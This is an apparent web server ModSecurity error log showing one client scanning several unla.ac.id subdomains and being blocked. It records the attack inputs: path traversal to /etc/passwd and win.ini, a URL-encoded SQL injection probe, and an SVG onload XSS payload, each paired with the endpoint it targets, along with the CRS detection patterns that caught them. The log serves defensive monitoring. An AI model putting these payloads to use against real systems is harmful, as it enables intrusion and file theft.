[Tue Aug 29 11:36:29.364509 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zcCo-f0AAAWcCQ4AAAAL"]
[Tue Aug 29 11:36:29.375059 2023] [:error] [pid 1435] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zcCo-f0AAAWbE9gAAAAK"]
[Tue Aug 29 11:36:30.372864 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWoV0sAAAAV"]
[Tue Aug 29 11:36:30.375159 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWqupEAAAAX"]
[Tue Aug 29 11:36:30.385549 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAATQXm8AAAAO"]
[Tue Aug 29 11:36:30.390159 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAWlCbkAAAAR"]
[Tue Aug 29 11:36:30.421615 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAASEJd0AAAAE"]
[Tue Aug 29 11:36:31.397327 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11z8Co-f0AAASEJeIAAAAE"]
[Tue Aug 29 11:36:32.378047 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAUbg7oAAABQ"]
[Tue Aug 29 11:36:32.379482 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAATQXncAAAAO"]
[Tue Aug 29 11:36:32.399837 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAATQXngAAAAO"]
[Tue Aug 29 11:36:32.401294 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAWoV1QAAAAV"]
[Tue Aug 29 11:36:32.408906 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAASHiDMAAAAD"]
[Tue Aug 29 11:36:33.411083 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110cCo-f0AAASEJesAAAAE"]
[Tue Aug 29 11:36:33.426265 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWexjEAAAAP"]
[Tue Aug 29 11:36:33.434718 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAASEJewAAAAE"]
[Tue Aug 29 11:36:33.530474 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV-t@oAAAAF"]
[Tue Aug 29 11:36:33.572046 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAAV9bz0AAAAA"]
[Tue Aug 29 11:36:33.580790 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAWoV1oAAAAV"]
[Tue Aug 29 11:36:33.581292 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAUbg8AAAABQ"]
[Tue Aug 29 11:36:33.591941 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV9bz4AAAAA"]
[Tue Aug 29 11:36:33.593171 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAASEJfEAAAAE"]
[Tue Aug 29 11:36:34.352586 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWx8x4AAAAg"]
[Tue Aug 29 11:36:34.355686 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAV9bz8AAAAA"]
[Tue Aug 29 11:36:34.360084 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWcCRsAAAAL"]
[Tue Aug 29 11:36:34.361254 2023] [:error] [pid 1448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWoV1wAAAAV"]
[Tue Aug 29 11:36:34.364868 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWqupMAAAAX"]
[Tue Aug 29 11:36:34.364946 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWrxpMAAAAY"]
[Tue Aug 29 11:36:34.367202 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110sCo-f0AAAShCc4AAAAi"]
[Tue Aug 29 11:36:34.367379 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAAWPpYQAAAAH"]
[Tue Aug 29 11:36:34.369217 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAV-t@wAAAAF"]
[Tue Aug 29 11:36:34.376098 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAASEJfMAAAAE"]
[Tue Aug 29 11:36:34.418722 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAT@KzQAAAA2"]
[Tue Aug 29 11:36:36.858658 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:ID: <svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO111MCo-f0AAAV9b0YAAAAA"]
[Tue Aug 29 11:36:36.919134 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWx8ygAAAAg"]
[Tue Aug 29 11:36:36.938925 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAATQXoQAAAAO"]
[Tue Aug 29 11:36:36.952376 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAUbg80AAABQ"]
[Tue Aug 29 11:36:36.978010 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAAWrxqMAAAAY"]
